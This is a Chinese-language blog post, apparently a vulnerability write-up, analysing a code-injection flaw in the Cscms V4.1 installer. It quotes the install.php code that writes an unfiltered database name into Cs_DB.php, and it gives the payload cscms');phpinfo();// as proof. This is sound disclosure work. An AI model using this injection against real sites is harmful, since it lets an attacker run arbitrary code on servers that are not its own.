Welcome to

色豹随心笔记

首页 / SQL / Cscms V4.1 getshell

Cscms V4.1 getshell

Cscms是采用PHP5+MYSQL做为技术基础进行开发的多元化内容管理系统。 cscms V4.1版本 install.php 由于过滤不严导致 getshell

漏洞分析:

在Cscms /plugin/sys/install.php 154行

 if(file_exists(FCPATH.'packs/install/install.lock')){
                exit('4');
            }else{
                $dbdriver = rawurldecode($_GET['dbdriver']);
                $dbhost = rawurldecode($_GET['dbhost']);
                $dbuser = rawurldecode($_GET['dbuser']);
                $dbpwd = rawurldecode($_GET['dbpwd']);
                $dbname = rawurldecode($_GET['dbname']);
                $dbprefix = rawurldecode($_GET['dbprefix']);
                if(is_numeric($dbname)) exit('6');
                if(empty($dbdriver)) $dbdriver='mysql';
                if($dbdriver=='mysqli'){
                    $mysqli = new mysqli($dbhost,$dbuser,$dbpwd);
                    if(mysqli_connect_errno()){
                        exit('2');
                    }else{
                        if(!$mysqli->select_db($dbname)){
                            if(!$mysqli->query("CREATE DATABASE `".$dbname."`")){
                                 exit('3');
                            }
                        }
                        mysqli_select_db($dbname);
                        //修改数据库配置
                        $this->load->helper('string');
                        $CS_Encryption_Key='cscms_'.random_string('alnum',10);
                        //修改数据库配置文件
                        $config=read_file(CSCMS.'sys'.FGF.'Cs_DB.php');
                        $config=preg_replace("/'CS_Sqlserver','(.*?)'/","'CS_Sqlserver','".$dbhost."'",$config);
                        $config=preg_replace("/'CS_Sqlname','(.*?)'/","'CS_Sqlname','".$dbname."'",$config);
                        $config=preg_replace("/'CS_Sqluid','(.*?)'/","'CS_Sqluid','".$dbuser."'",$config);
                        $config=preg_replace("/'CS_Sqlpwd','(.*?)'/","'CS_Sqlpwd','".$dbpwd."'",$config);
                        $config=preg_replace("/'CS_Dbdriver','(.*?)'/","'CS_Dbdriver','".$dbdriver."'",$config);
                        $config=preg_replace("/'CS_SqlPrefix','(.*?)'/","'CS_SqlPrefix','".$dbprefix."'",$config);
                        $config=preg_replace("/'CS_Encryption_Key','(.*?)'/","'CS_Encryption_Key','".$CS_Encryption_Key."'",$config);
                        if(!write_file(CSCMS.'sys'.FGF.'Cs_DB.php', $config)) exit('5');

通过代码可以看到 dbname 没有任何过滤,直接写入到配置文件 cscms/config/sys/Cs_DB.php。这样就导致可以写入任意php代码。

漏洞证明: 在安装页面 数据库名设置为 cscms');phpinfo();//

1.png

然后创建数据,继续完成安装。安装完毕后看配置文件 cscms/config/sys/Cs_DB.php

2.png

可以看到 dbname 没有任何过滤 直接写入到了 配置文件里。

访问 http://localhost/cscms/config/sys/Cs_DB.php 

3.png


本文暂无评论

发表评论

您的电子邮件地址不会被发布。

>> <<